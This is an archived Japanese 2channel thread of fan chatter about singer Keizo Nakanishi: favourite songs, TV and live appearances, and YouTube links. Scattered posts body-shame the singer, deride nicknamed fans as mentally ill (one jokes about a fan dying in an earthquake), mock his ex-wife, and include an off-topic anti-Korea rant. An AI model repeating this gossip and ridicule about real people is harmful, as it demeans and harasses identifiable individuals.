188 :
貞子、いよいよ精神科入院w

189 :
醜い婆あ同士の争いスレw

190 :
貞子VSピンクハウス
↑ この二人元々は仲がよかったんだよね?

191 :
ZooのネイティヴとかChooChooTranとか中西の歌上手過ぎ
http://jp.youtube.com/watch?v=lBhfNwBEB0o&feature=related
http://jp.youtube.com/watch?v=2Rn9CqbajPY&feature=related

192 :
最近中西圭三にはまった30代です。
中西圭三のおすすめの曲とアルバムを教えてください

193 :
タンジェン・アイズって曲が好きだった

194 :
朝スタで生ウーマンきたーーーー

195 :
いま特ダネで生でWOMAN歌ってるよ!

196 :
ひさびさに聞いたけどよかった

197 :
今日のフジテレビ「とくダネ!」の朝のヒットスタジオでの圭三ちゃんのWoman生演奏に触発されて
イーブックオフで中古CDアルバム3枚注文しちゃいました。
エール、ステップス、スターティング・オーバーの3枚が送料込みで合計315円なのは
非常にお得です。

198 :
今朝のやつ
http://jp.youtube.com/watch?v=yhAVMnHE9MU

199 :
>>192,
悲しいけれど某bkof並びに
同様の店で物色するがよし。
どれも百円です。

200 :
スタイルが岡村靖幸みたいになっていたことにショックだったが歌は相変わらず上手かった。

201 :
>>199
おすすめは何かって聞いてるのに何で?

202 :
昔、スピードのホワイトラブの前奏 たーらったったらー
の部分が「WOMANきみーがー」のところに酷似していて腹立ったのは自分だけではないはずだ。

203 :
おぬぬめの曲ってより、全アルバム集めてもたいした金額にならないんだから
全部買えばいいじゃん。

204 :
日本語ワカリマスカ?

205 :
書き込み時刻が… orz
04:44:44
これで二回目かな。なんか不気味だよねw

206 :
ここには圭三ファンがいない

207 :

オススメってか、個人的にはZooに提供した楽曲が好きだな。
あとダイヤモンドレインやチケパラなど、代表曲が好きですな。

208 :
片思いの女の子に
「片思いのバースデー」のCDをプレゼントして自爆した1992年。
翌日から無視された。
若かったオレ。

209 :
圭三はSINGLESとかベストアルバムも多数出てるから。
アマゾンで購入すれば翌日に届くよ。
おすすめは「青い影」とか「非情階段」かな。

210 :
こんなヤツのファンなんかまだいるのか?
コイツって性格悪そうだよな

211 :
こんなヤツのファンなんかまだいるのか?
コイツって性格悪そうだよな
こんなヤツのファンなんかまだいるのか?
コイツって性格悪そうだよな
こんなヤツのファンなんかまだいるのか?
コイツって性格悪そうだよな
こんなヤツのファンなんかまだいるのか?
コイツって性格悪そうだよな
こんなヤツのファンなんかまだいるのか?
コイツって性格悪そうだよな

212 :
ファソはもっと性格悪いから丁度いいんだよw

213 :
似た者同士ってやつかw

214 :
中西圭三が歌う ネイティブ チューチュートレイン とかすごくかっこいいですね。歌声は超イケメン。EXILEなんかより全然いい。 またダンス曲だしてほしい。

215 :
やっぱりルックスも重要だよな
豚じゃなw

216 :
江原さんとつのだ☆ひろさんを足して2で割ったような
風貌といい声。

217 :
>>216
江原とつのだに失礼だろw
圭三は背が低いし

218 :
江原は佐藤竹善だろw

219 :

まあ、カラオケで完璧に圭三歌えたら、Aクラスだろうね。

220 :
間奏の部分で独特のお決まりのメロディーラインがあるよね。 それと イェーエイ!っていう独特のコブシがカッコエエ。

221 :
zooの作曲をなんで途中で抜けたのか長年の謎です。そのせいでzooが落ちぶれたんだと思う。もったいない。バトンタッチした横山きいちのジャングルとかいうのがダサダサでzooファンやめたんだった。

222 :
横山輝一wwwwwwwwwwwwwwwwwwwww

223 :
最近ファンになったんだがイーブックオフでほとんどすべてのアルバム購入
初期のアルバムは今となっては聞けないが1995年のgraffitiからは今でもいけるかな

224 :
加護亜依が中西のライブを見に行ったって書いててワロタ
接点も何もなくね?

225 :
ZOOで一番好きなのは、SHY-SHY-SHYなんだが、中西作曲じゃなかった。
もちNATIVEとかGorgeousも好きだが。

226 :
つーか、みんな圭三の曲で一番好きなのなによ?

227 :
「体温」

228 :
最後の雨

229 :
>>226
WITH

230 :
ズーの プレゼントプレジャー と 君は君の誇り が好きです。

231 :
>>226
一つに絞るなら悩むが、
いくつか挙げていいなら、
チューチュートレイン
ユー&アイ
タイミング

232 :
作曲と歌唱だけの人って珍しい気がしません?

233 :

一枚でいいからR&Bに特化したアルバムを出してほしい。
その中の一曲は、天才ディーバ、小柳ゆきチャンとのデュエットで、お願いします。
もち、これをシングルでだしてね!
http://jp.youtube.com/watch?v=R6As1xYu_rU
背も、ちょうどいいし…w

234 :

小柳ゆき - Over The Rainbow
http://jp.youtube.com/watch?v=5Xv1nRqYElE

235 :
おかあさんといっしょの5月の月歌の
まんまるスマイルってもの凄い良いね!

236 :
体温!私もスキ!
あの時のアルバムは二枚ともいいね。
今でも聴いてる。

237 :
体温って、前嫁の為に作ったってやつでしょ?
前嫁が、徹子の取調室で昔話してたのを覚えてる。

238 :
明日は名古屋らしいよ?
想像妊娠したり婚約者と触れ回ったりしてた貞子は来るのかな?
どの面下げて来るんだかw
でも、中国で活躍中の女優だとか自称してたから地震で死んでるかもねw

239 :

青い影って、出た当時は売れたの?

240 :
十一月十一日、三菱病院でうまれたから、圭三なんですよね。

241 :


242 :
倉敷の三菱病院ね

243 :
倉敷じゃなくて水島じゃないです?

244 :
圭三ちゃんはフルアルバムのリリースの予定はないの?

245 :
前妻がただ働きのM奴隷を募集中
圭三さん行ったら?
ttp://ameblo.jp/smile-saya/entry-10109207478.html

246 :
ざまあみろだねw
「私のこころはすごく悲しいです」 ブログ炎上に高樹沙耶が綴る
http://news24.2ch.net/test/read.cgi/mnewsplus/1214570581/

247 :
>>242
>>243
倉敷市の水島ってことで

248 :
圭三はMCだな。お笑い系。

249 :
21日の札幌でのライブ見に行ったら相変わらずアイスキューブ男と大木凡人激似の女がいたw
アイスキューブ男(=ぶ男の意味w)
大木凡人激似女札幌在住
身障チャソ
西川口ピンクハウス
貞子サン名古屋メンヘル
こいつら全員未だに現役なの?他にやることないの?
圭三の歌は好きだけどこういうのとかかわりあいになりたくないんだよね。

250 :
>>249
ファンの中には、愛が憎悪に変わってしまった人も居ると思う。
自分の元友達もそうだった、学歴も無く正業に就いた事がなくて、資格が
無いから年下の正社員のパシリをさせられて、給料もバイト代程度しか貰
ってなかった。
結局、彼女はどんな努力しても報われなくて、その鬱憤を圭三とか、常連
ファンににぶつけて、文句ばかり言ってた
周りも彼女の同じくらい不幸じゃないと嫌だったようだ。
縁切って良かったよ。

251 :
最高だな 曲の完成度が凄い
http://jp.youtube.com/watch?v=J7tVohiUcLM

252 :
ロクシタンの特別本に夫婦で出てたね
奥さん綺麗じゃん
なんでこんな豚と・・

253 :
ピザっててびびった
オペラ歌手っぽくなってたが、声量は劣化してた

254 :
以前、倉敷でコンサートにいった。話し上手。

255 :
そ〜れ〜がっ 君の ace♪
ウーマンき〜みがぁ〜探してる〜ッ

256 :
阿久悠トリビュートとか、さだまさしトリビュート参加とか、
最近声を良く聞くようになってうれしい

257 :

俺のBest1 は、夜に火をつけてかな。
Best2が同率でYou & Iと青い影
3番目が非情階段だね。
いつも思うんだが、圭三はタイトル(曲名)で損してるね。
日本人は英語の曲名が好きだからな。
上記の3曲なんて、その典型。
英語タイトルだったら、もうちょっと売れてたよ。

258 :

それと、圭三って、失恋の曲でも明るい調子の曲が多いんだけど、
「夜に火をつけて」のように、ジョージ・マイケルのケアレス・ウィスパー
みたいなマイナー調の曲の方が、歌のうまさが引き立つと思うんだけどなぁ。
もっとああいう曲を作って欲しいね。

259 :
先日カラオケで歌いたい曲がなかったので久しぶりに「眠れぬ想い」を歌ったら、中西圭三熱に火が点き、調べたら11月に横浜でライブがあるのを知りチケットを取った。
中西圭三のライブは東京ベイNKホール以来の参加なんだが、当時と歌う曲やライブの感じは全然違いますか?

260 :
俺は「非情階段」歌うよ、元キーで。
米倉も意識しながら。

261 :

非情階段なんて楽勝だろ普通。
余程の音痴でない限り。


262 :
小堺に変わってお昼のごきげんよう司会を変わらないテンションで勤める中西

263 :
http://www.sponichi.co.jp/entertainment/flash/KFullFlash20081029042.html

264 :
>>263
鈴木亜美がCDリリースができなくてCD付写真集を発売したときに曲のプロデュースした横山輝一みたいだね
でも加護亜衣プロデュースはもっと痛いかなw

265 :
お誕生日age

266 :
そうだったね!!けいぞうさんおめでと〜(*^_^*)

267 :
「大怪獣バトル」の主題歌、イトーヨーカドーの営業・・・
圭三よ、仕事選んでる?

268 :
圭三さん今何してる?

269 :
>>268
う○こしてる

270 :
中西圭三は高校〜大学前期によーく聞いていたなぁ。
WomanやYou and IやSO BADは好きだなぁ。
有ったらまた入れとこ。

271 :
他のアーティストへの楽曲提供は当たるのに、自分が歌う曲はさっぱり当たらない圭三ちゃん
横山輝一と同じパターンじゃんw

272 :
だから・・・
もう少し時間を下さいってお願いしてるだろ。

273 :
いつまで待たせる気だよ。一生かwww

274 :
ウルトラマンだかの特撮系のOPとED担当してるから、
両A面シングルで出せばそれなりに売れるんじゃね?

275 :
>>274
圭三では売れないよ
羞恥心とかおバカタレントの歌が売れる時代だからね

276 :
中西に苦情を言いたいのだが、ここでいいのか?

277 :
ぼよよん行進曲だが、お前が歌え。
聞きたい。買うし。
しょうこ姉さんも魅力的だが、お前が歌え。
ガキレベルを超える完成度の歌。

278 :
ランボー最新作出てたね
名演技だったよ

279 :
圭三さんは、デュエットしないの?
AIあたりの渋いのから、テルマ、福原美穂なんて良いような気がするんだが。
MISIAや、美和なんかは圭三さんとの声のバランス的に良くない希ガス。
年代的には小比類巻なんかも、しっとり大人のバラードあたり…
他は、下手な奴ばかりだからな。
デュエットのバラードいいなあ…。

280 :
>>279
だいたいfeaturingになっちゃうからなぁ。
最近では大黒摩季のに参加してるし、ちょっと前には大橋純子とか。
あ、LIGHTHOUSE OF LOVEはある意味デュエットじゃないか?

281 :
「最後の雨」しか知らないニワカですが今スカパーで恋するカレンって曲のPVが
流れましたけどアレって狙って、ああいうPVにしてるんですか?それともガチで
制作費の関係であんなショボいPVになったんですか?悲しすぎます。

282 :
中西違い。
それは保志だよ。

283 :
もうテレビや雑誌には出ないのかな

284 :

もう、そろそろプロデュースに専念したほうが
良いんじゃないかな。
って、もうしてるか。

285 :
>>283
たまにはメディアに出ないと一般人に忘れられちゃうよな

286 :
最近、ものまね番組なんかに中西保志が出たり、
久保田利伸がスマップの番組にでたりしてるけど
圭三は、ほとんどみかけないね。
ものまねするにしても、圭三のマネはマジ難しいからなあ。

287 :
日テレ 誰も知らないなける歌に出るらしいよ〜 
詳細は知らん
ぼよよん行進曲がノミネートか?



288 :
日テレ「泣ける歌スペシャル」に出るらしい
そういえば前回も前々回もテレビ出演は日テレの音楽番組だった気がする
知人がいるんかいな

289 :
光のかけらにしても愛のしるしにしても
最近のバラードはなかなか良いね。
初め地味かと思っていても何度も聴いているウシに良くなってくる

290 :
>>224
お前だけすでに2009年だったな

291 :
最近中西さんの良さに気づきCD集めてます

中西さん今はメタボでリリースもあまりされてないんですね

動画サイトでライブ映像を見ましたが
彼のライブは面白そうですね
アマゾンでライブDVD探してみます

292 :
CD屋に行ったら中西保志がカバーアルバム三枚も出していた。
圭三さんもカバーアルバム大量に出したら
徳永英明みたいに再び火がつくかもしれないよ。
でも見た目がなぁ…

293 :
>>292
ttp://www.universal-music.co.jp/nakanishi_keizo/upch1194.html
↑がパッとしなかったからこの手の企画はもう無いかと

294 :
皆さん、先週4月29日の上野公園でのミニ・ライブは観に行きました?
情報が行き渡らなかった?だとしたら、惜し過ぎ!

295 :
他のアーティストの二番煎じのような事は辞めて欲しい
ただでさえ一度失敗してるのに…
某クラスのように「Woman2009」とか発売したら泣く

296 :
29日良かったですよ。チュウチュウートレインとか、ぽよよんとか。ウーマンはまさかのアンコールで!

297 :
圭三さんのライヴって楽しいですか?

298 :
圭三さん、飲むとしつこいんだねw

299 :
それどこ情報?もしかして抱かれたのか!?

300 :
圭三さんの携帯サイトに登録したんですが
使用料とるのにさらに着うた有料なんですか!?
しかも音悪いし欲しい曲ないし
ブログも全然更新されてないしやる気あるんですか!?今月末で解約したほうがいいですか?

301 :
>>299
つ[ようつべ]

302 :
晒しage

加護ちゃんのニュースの写真に一緒に写ってたね
以前よりは少し痩せたと思うけど顔の肉は相変わらず…
とにかく痩せて欲しい、元々イケメンではなかったのに
デブっちゃったから見た目いいとこなしになっちゃってるよ

303 :
まあ酒太りでしょうね

304 :
酒は飲めないって言ってたよ
禁酒してるのかな

305 :
デブ本サイトによると甘いモノ太りらしいぞ

306 :
唄ってる時の体の揺らし方がキモい
まさにゴリラって感じw

307 :
今は豚ってて体が重いからか
あんまり体揺らしてないよwwww

308 :
>>307
昔のWOMANの頃とか奇妙なノリだったよね

309 :
WOMANで大好きになってアルバム「Yell」とか一時期狂ったように聴いてたw
しかし今聴くとすごいダサいんだよな〜

310 :
>309
今でも「KEIZO〜かなわない夢もあった」聴いてますが何か?
個人的に初期の曲は
サウンドは古臭く感じるけど曲や詞がすごく好きで今でも聴いてる。
まぁ確かに「恋はハートオブファイアー」とか
タイトルからしてダサいけどね、でも好きだけど。

311 :

Glory Daysが、最近の通勤ソングです。
歌の練習でも歌わせて頂いてます。
完コピ目指してます。

312 :
皆さん、圭三さんがダイエットしているそうですよ
成功するよう応援しましょう

313 :
一番売れたのって自分の歌じゃなくてChooChooTRAINじゃまいか

314 :
>>313
エグザイル含めなければTimingの方が売れたんじゃね?

315 :
一本道行った方います?
自分は二日目に行ったんだけど
懐かしい曲ばかりで嬉しかったよ。
やっぱり90年代の曲が最高だな。
それとパパゴンさんの事を、太っているとネタにしていた。
きっと観客全員「お前が言うな!!!!」と思ってた筈

316 :
中西圭三さんのA whole new world、覚えていらっしゃる方いますか?
素敵でしたよね〜☆
あれは、かなり前。たしかミュージックフェア。
霧なんとかさんとのデュエットで。
あの映像、どこかで見られないかなぁ。

317 :
>>316
霧…誰だろう?
似た漢字だと露崎春女?
>>313-314
「タイミング」は200万枚、「ChooChooTRAIN」はZOOで
110万枚らしい。

318 :
氷角、ネットから引退だってね。
何をたくらんでいるのやらw
♪ジャンプするには一度しゃがむの〜

319 :
九州の番組に出てたの見た人いる?
ぼよよん行進曲、ぱわわっぷ他アカペラで歌ってたよ。
アカペラだとやっぱり声量迫力あるね。

320 :
最近青い自転車で通勤している

321 :
インフルエンザ拡大で鳥取公演中止って・・・www
結局、チケット売れなかっただけじゃないの?

322 :
永遠の名前
http://www.youtube.com/watch?v=a_AVcFJ-xZM

323 :
顔がデカい
チビデブ

324 :
毎日有線でかかっていてすごくいいな、誰の曲だろうと思っていたら中西さんの悲しみにキリがないよでした。
声は横山輝一さんかと思っていましたけど

325 :
見た目チンピラになったなウイ

326 :
ブタゴリラ

327 :
アルバム『STARTING OVER』を聴いている。
この人、歌も上手いし作曲の才能もあると思うのに、
世間的には埋もれちゃった感があって、すごく勿体ない…。
売り方、活動のしかたがまずかったのか?
私は、中西さんとは全く関係のないバンドのファンだけど、
若い頃に生歌を聴いておきたかったなあ。

328 :
益子育江は、ひどい女だよ中西を弄びやがって!!

329 :
自分も売れてZOOに楽曲提供しぶったあたりから狂ったな

330 :
>>328
益子育江って
誰?
益戸だったら知ってるけどwww
圭三が高望みし過ぎたからダメになったんじゃないの?
別れた時、言いたい放題されていいザマだったよ。

331 :
test

332 :
4月のリクエストライブのチケ取れた!
初めてライブ行くからかなり楽しみ。
19年記念してのリクエストライブだからどんなのやってくれるんだろ?
「夢の名前」とか「夢の果てまで」聞きたいな〜

333 :
このブタゴリラ性格悪そう

334 :
今 長野県の番組に出てた。
ほんとにブタゴリラだった… こんなだったっけ?

335 :
よほど かみさんの料理がうまかったんだろう?

336 :
優柔不断で女々しそうなブタゴリラだよなwww
見かけも歌も劣化しまくりwww

337 :
やっと復旧したー、
HEY×3でオカマのオッサン、昔のCD髪型違いの別ジャケットだったこと触れてやるなよ黒歴史なんだからw

338 :
詳しく

339 :
>>337
友達が久しぶりに中西見たらしく
異様に太ってて驚いたらしいw

340 :
この人南こうせつに似てね?

341 :
おすぎにも似てる

342 :
すまん、もう一人の中西さんと勘違いしてた

343 :
>>339
今日ジャントルハートコンサート見たけどびっくりした。
あれでぼよよん行進曲歌ってジャンプしたから吹いた。

344 :
今日世界仰天ニュースでぼよよん

345 :
ウーマンって曲があったと思う。
ウーマン君が〜探してる〜 っていう。この曲のメロディ凄いよね。いくつかのメロディをつなぎ合わせた感じで。
「何だこの曲は」みたいに思った記憶がある。
「こんな曲になるわけがない」と思ったけど、同時に「これ曲として成立してるわ。凄い」とも思った

346 :
中西圭三さん絶対味方だ。結局ね、>>345くらいしてくれないと何も感じないって事。
中西圭三さん結構勝負かけたんじゃないかな?

347 :
おまいら、UST見なかったの?

348 :
知らね

349 :
yamachin_nu

東京プライドパレードに中西圭三さんが参加!
いや、別に良いけど、芸能界って言いずらいんだな。
約1時間前 webから

350 :
9月20日は大黒摩季とライブ

351 :
行った人居るの?

352 :
やっぱり改めて聞くといいなあ
古いアルバムも全然色あせない
中古屋でかなり安くなってるのが悲しい。
屈指のメロディーメーカーでありボーカリストだよ
このスレ過疎ってるのが悲しい…

353 :
あげ

354 :
保守

355 :
ツイキャスで偶然ハケーン
ttp://twitcasting.tv/sakura238r/show/

356 :
最近ではこんな仕事もしてます
http://www.youtube.com/watch?v=hOycxkUYBT0

357 :
アリナミンVのCMの
♪あうたび〜あな〜たに〜ひかれていきます〜
は「眠れぬ想い」の
♪届かぬ〜想いを〜
ってところに微妙に似てる。

358 :
BSプレミアムの青春の80’sに出るから見たんだけど、更に太ってきてるねw
さすがにちょっと悲しくなったわ

359 :
実力派アーティストだし体型とかどうでも良いな。声さえ十分でてればオケ!
スターティングオーバーまではそれこそ毎日のように聴きまくったなぁ。
YouTubeのドサ回りみたいのでも口パクせんで信じられんような歌唱力を惜しみなく披露してる。
実力が売れる要素のすべてなら絶対間近で聴ける歌手じゃない。今がチャンス?

360 :
AKBが売れるこんな時代に売れたらそれこそ松代までの恥だと思うの

361 :
BSで歌ってる所みたけど
ご本人が歌う「タイミング」と「Choo Choo TRAIN」がよかった
八百屋の呼び込みみたいに野郎っぽくなるけどギリ「がなり」にならない所と
妙に艶っぽく歌う所をいったりきたりする感じがくせになる。

362 :
プヨヨン体操と風雅とか言う局のシングルが出てたから
買ってみたけど、販売元がタワーレコードてw
インディーズっぽいけどレコード会社と契約してないんかな?
エイヴェックス辺りと契約できればよくも悪くも大量にリリースさせてもらえるのに

363 :
シルエット・ロマンスのカバーをYoutubeで聞いたら
予想の1段上いった艶っぽい歌い方してて吃驚w
もうちょっと無機質に歌ってもヨカッたのに。

364 :
http://www.youtube.com/watch?v=_OrvRvv5O1Q&feature=related

365 :
小さなライブハウスとかで聴けるなら一万円くらい出してもいいけどな。

366 :
この前ライブ行って来たけど声量がハンパないね。
20周年のライブ行きたいな〜

367 :
夜に火をつけてって曲が好きだわ

368 :
ブラックビスケッツのタイミングとか、
ズーの曲とか、大ヒットが沢山あるね。

369 :
今9チャンでライブやってる、タイミング歌ってる
超久しぶりに見たけど凄い太ったのね
でも声は凄い出てて上手い、ギターだけの伴奏で歌ってる

370 :
江頭つとむ
http://tsutomu-e.net/index2.html
邦楽の救世主は彼しか居ない!

371 :
ほげ?

372 :
♪遠く〜遠く〜You&I
って曲、中西圭三だとおもうけど、
中西圭三の名曲の一つ?
個人的に思い入れある曲
しっとりして、それでいて曲に勢いがあって、
なおかつ、都会的でオシャレ
あんまりこういう曲って他にないよね

373 :
それは中西保史の曲

374 :
>>373
中西圭三の曲です!

375 :
http://chie.mobile.yahoo.co.jp/p/chie/qa/view?qid=1397873808

376 :
中西圭三さんにカバーしてほしい曲
http://kohada.2ch.net/test/read.cgi/gaysaloon/1348570341/l50

377 :
゚・*:.。. .。.:*・゜圭三さんのかくれた名曲゚・*:.。. .。.:*・゜
天使はいつもそばにいる (シングルbugのカップリング 優しい感じのバラード)
HIGHER SELF  (本人初?の作詞曲 現在でも通じるような最高の哀愁曲)
さよならの向こう側  (山口百恵のカバー曲 本家を超越してると思う)

378 :
>>372
だ〜きしめ〜て〜、YOUアンドI
名曲ですよ

379 :
中西圭三ベスト @眠れぬ想い A次の夢 BYouandI

380 :
新しい僕になろう
旦那が好きでよくカラオケで歌う
私はこの歌詞が嫌いだ
まあ、中西が作詞してるわけではないけれど

381 :
まあ 恋人の前で歌う物じゃないね<新しい僕になろう

382 :
>>372
しっとりしたグルービーな曲だね
深夜のテレビCMでよく流れてた
素敵な曲

383 :
最後の雨?

384 :
兵庫県たつの市のジョイントライブ行ってきた!相方は杉山清貴
楽しかった〜圭三さんノリよすぎる〜次は単独ライブ行きたいな

385 :
>>384
中西さんと杉山さんって、かなり魅力的な組み合わせだね
生演奏きけて羨ましいです
どちらか片方のライブのスペシャルゲストみたいな感じでしたか?
それとも音楽イベントだったのかな

386 :
時間が区切られててソロライブx2みたいな感じだったが、最後2人で3曲ぐらいジョイントしたらこれが大盛り上がりww
楽しかったっす

387 :
了解しました
教えてくれてサンキューです

388 :
昨日フジテレビの音楽番組で杉山清貴でてたね
かなり良かった

389 :
偏った思想の多い2chだけでなく、
一般社会でも、韓国を嫌う日本人が急増してるのを実感する
韓国グループのライヴが全然埋まらなくなってきてるし、
世論調査でも嫌いな国として韓国をあげる人が倍増
今日、政府が発表した「領土問題に関する国民の意識」でも、
「竹島は日本の領土であり、韓国が不法占拠している」や「国際法上、日本の領土と認識されている」と答えた人がそれぞれ60〜70%にも達した
そして竹島に関心があると答えた人は70%を超えた
以前は「わからない」「興味がない」という日本人が多かったのに、ここ数年で国民の意識に大きな変化が起きている
あれほど韓国の素晴らしさを力説していた芸能人も最近は全くといっていいほど韓国の話をしなくなった
こんなときだからこそ、韓国の素晴らしさを日本に伝えていくべきだと思う

390 :
また下関で池田聡とのジョイントライブあるね

391 :
行きたいなぁ 遠くてムリだわ 

392 :
本州の西端だからねぇ、東京から新幹線で5時間か

393 :2013/10/22
しばらく忘れてたけど、この前の
ハモネプ見て、大好きだった
20年前の気持ちがよみがえってきちゃった。
eテレのパワワップなんか聞いて  気持ち静めてます。
TOP カテ一覧 スレ一覧 2ch元 削除依頼
【青森】サガユウキを応援するスレ【下北半島】 (209)
今井寿 (330)
【Gackt?Hyde?】奇跡の声・Klaha【Rよバーカ】 (345)
所ジョージはシンガーソングライター (489)
おおはた雄一 (472)
【X JAPAN】 PATA 1 【Ra:in】 (269)
--log9.info------------------
【´∀`】 モナーアニメをフラッシュで 【・∀・】 (363)
【自主制作アニメ】夏の放課後 A-3 (189)
しっぽのスレ (820)
【紅白】TORINOで遊ぼう その2【オリンピックも可】 (175)
ダウンロードができないorz (382)
自分の作ったシナリオで他人にFLASH作ってもらうスレ4 (187)
『のらねこスタヂオ』ってどうよ? (124)
FLA作れないヤツ、ネタ考えろ、作ってやる (237)
名作Flashを携帯に移植しよう2 (640)
Macromedia Flash Player8 (134)
【パクリ】Flash解析ソフトを使う職人【うめえ】 (107)
【脱出】White Chamber攻略スレ【新作】 (635)
初心者たちが勉強しながらBattleCityを作るスレ (335)
戦略シミュレーションゲームを作るスレ (106)
■ 移転ですー (283)
【おっぱい】エログラミング Ver.0【まん○】 (225)
--log55.com------------------
一応全盛期らしい乃木坂、未だにテレビの全国放送レギュラー番組なし、田舎で人気あるわけないやん
生駒が卒業後の乃木坂が外番組で大活躍しまくりまくりすてる
【ジコチューで行こう!】乃木坂46★8505【本スレ】
【悲報】生田絵梨花、斉藤優里、西野七瀬がフランスで盗撮される。。
【坂道オーデ】どろかつちゃん応援スレ 1【70番】
【ジコチューで行こう!】乃木坂46★8506【本スレ】
【乃木中】日村なんでも廃品回収感想スレ
【乃木坂46】齋藤飛鳥応援スレ★109【あしゅ】